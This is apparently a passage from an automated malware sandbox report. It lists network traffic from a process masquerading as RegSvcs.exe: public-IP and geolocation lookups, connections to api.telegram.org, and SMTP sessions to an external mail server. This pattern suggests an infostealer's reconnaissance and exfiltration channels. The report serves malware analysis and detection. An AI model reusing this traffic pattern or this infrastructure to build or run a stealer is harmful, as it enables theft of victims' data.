Jul 25, 2024 18:07:57.798166990 CEST	443	49723	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:57.798274994 CEST	443	49723	188.114.96.3	192.168.2.10
Jul 25, 2024 18:07:57.798340082 CEST	49723	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:57.798846960 CEST	49723	443	192.168.2.10	188.114.96.3
Jul 25, 2024 18:07:57.814281940 CEST	49722	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:57.820997000 CEST	80	49722	193.122.130.0	192.168.2.10
Jul 25, 2024 18:07:57.821052074 CEST	49722	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:07:57.823354959 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:07:57.823386908 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:57.823450089 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:07:57.823877096 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:07:57.823894024 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:58.483352900 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:58.483434916 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:07:58.487221003 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:07:58.487232924 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:58.487504959 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:58.489111900 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:07:58.532500982 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:58.817821980 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:58.817886114 CEST	443	49724	149.154.167.220	192.168.2.10
Jul 25, 2024 18:07:58.818046093 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:07:58.822658062 CEST	49724	443	192.168.2.10	149.154.167.220
Jul 25, 2024 18:08:05.393615961 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:05.394124985 CEST	49710	80	192.168.2.10	193.122.130.0
Jul 25, 2024 18:08:05.398570061 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:05.398644924 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:07.248557091 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:07.248877048 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:07.255352974 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:07.782233953 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:07.784591913 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:07.789757013 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:08.124645948 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:08.125439882 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:08.130312920 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:08.477339029 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:08.477571011 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:08.483387947 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:08.826894045 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:08.827217102 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:08.832664013 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:09.171437025 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:09.171730042 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:09.185209036 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:09.518290043 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:09.518878937 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:09.518927097 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:09.518948078 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:09.518961906 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:08:09.524013042 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:09.524065018 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:09.524108887 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:09.524118900 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:16.410465956 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:08:16.453002930 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:09:44.797549009 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:09:44.804436922 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:09:45.353741884 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:09:45.354137897 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:09:45.354979038 CEST	49729	587	192.168.2.10	103.163.138.29
Jul 25, 2024 18:09:45.361352921 CEST	587	49729	103.163.138.29	192.168.2.10
Jul 25, 2024 18:09:45.361403942 CEST	49729	587	192.168.2.10	103.163.138.29

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 18:07:45.170339108 CEST	56180	53	192.168.2.10	1.1.1.1
Jul 25, 2024 18:07:45.179477930 CEST	53	56180	1.1.1.1	192.168.2.10
Jul 25, 2024 18:07:45.919500113 CEST	57890	53	192.168.2.10	1.1.1.1
Jul 25, 2024 18:07:45.927757978 CEST	53	57890	1.1.1.1	192.168.2.10
Jul 25, 2024 18:07:57.814227104 CEST	60266	53	192.168.2.10	1.1.1.1
Jul 25, 2024 18:07:57.822643995 CEST	53	60266	1.1.1.1	192.168.2.10
Jul 25, 2024 18:08:04.783437014 CEST	59233	53	192.168.2.10	1.1.1.1
Jul 25, 2024 18:08:05.392147064 CEST	53	59233	1.1.1.1	192.168.2.10
Jul 25, 2024 18:08:16.929986000 CEST	53	57268	162.159.36.2	192.168.2.10
Jul 25, 2024 18:08:17.487128973 CEST	61538	53	192.168.2.10	1.1.1.1
Jul 25, 2024 18:08:17.495183945 CEST	53	61538	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 18:07:45.170339108 CEST	192.168.2.10	1.1.1.1	0x8e76	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:45.919500113 CEST	192.168.2.10	1.1.1.1	0xba26	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:57.814227104 CEST	192.168.2.10	1.1.1.1	0xb245	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:08:04.783437014 CEST	192.168.2.10	1.1.1.1	0x30d7	Standard query (0)	mail.lenteraandalan.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:08:17.487128973 CEST	192.168.2.10	1.1.1.1	0x2d2	Standard query (0)	56.126.166.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 18:07:45.179477930 CEST	1.1.1.1	192.168.2.10	0x8e76	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 18:07:45.179477930 CEST	1.1.1.1	192.168.2.10	0x8e76	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:45.179477930 CEST	1.1.1.1	192.168.2.10	0x8e76	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:45.179477930 CEST	1.1.1.1	192.168.2.10	0x8e76	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:45.179477930 CEST	1.1.1.1	192.168.2.10	0x8e76	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:45.179477930 CEST	1.1.1.1	192.168.2.10	0x8e76	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:45.927757978 CEST	1.1.1.1	192.168.2.10	0xba26	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:45.927757978 CEST	1.1.1.1	192.168.2.10	0xba26	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:07:57.822643995 CEST	1.1.1.1	192.168.2.10	0xb245	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:08:05.392147064 CEST	1.1.1.1	192.168.2.10	0x30d7	No error (0)	mail.lenteraandalan.com	lenteraandalan.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 18:08:05.392147064 CEST	1.1.1.1	192.168.2.10	0x30d7	No error (0)	lenteraandalan.com		103.163.138.29	A (IP address)	IN (0x0001)	false
Jul 25, 2024 18:08:17.495183945 CEST	1.1.1.1	192.168.2.10	0x2d2	Name error (3)	56.126.166.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49707	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:45.192295074 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 18:07:45.740808010 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:45 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4e474694b5b27184174bd471e497e0c1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 18:07:45.745800972 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 18:07:45.851861954 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:45 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 62bb0492dfcbd7ebd95c938cb1686527 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 18:07:46.628179073 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 18:07:46.738796949 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:46 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 264ec89ebc52740cedf2f067844fc7f2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49710	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:47.391824007 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 18:07:47.880923986 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:47 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e06a92d6be6061ade99009d078047949 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49712	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:48.548875093 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 18:07:49.196365118 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:49 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 60ae7c4722a5e6c0d75fa419332aa031 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49714	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:50.042910099 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 18:07:50.586170912 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:50 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 364480d16ec7167d8dc2eaa8739b22f8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49716	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:51.438067913 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 18:07:52.103502989 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:52 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6b33ec6f890be78cbc197470331d391e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49718	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:53.292788982 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 18:07:53.780328035 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:53 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 918971cdd0ac001222fc32a8f261fbf8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49720	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:54.407397985 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 18:07:55.060585022 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:55 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e800cfd9b0d9fc0c6fded925c8148b06 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49722	193.122.130.0	80	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 18:07:55.816284895 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 18:07:56.962066889 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:56 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 43cdf6ac510a3a2256d595f5ec53500a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49708	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:46 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 16:07:46 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:46 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52389 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jh9kzvfytzOQbIK5S%2BdZHf7lZCIAekaAibf8J5Uxl93wfdM6Tirwk6PDhsahbs0f%2Fh6nf4iqWnGZAMpApvX4t01Mpo7F7IaEYjVp6aSDS0vnO1G75CdPVz%2FdhPB7aDvLax2nlwOu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67a3dcb542d3-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:46 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49709	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:47 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 16:07:47 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 16:07:47 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 52390 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HVW1LsWsKaABIP1KcIIgOVOpEHBrrwSZKW4x38hzOL1ILNwNijR1tvWnEG0pK26TJ3QXmhaqmJWOyWFfbFMNRtm9XgywzC%2Bg18j3FIbpU31zPNUv8ASAQU4TOEM7Nn33fmDL2KHT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8d67a8a8be8c57-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 16:07:47 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 16:07:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49711	188.114.96.3	443	7392	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 16:07:48 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
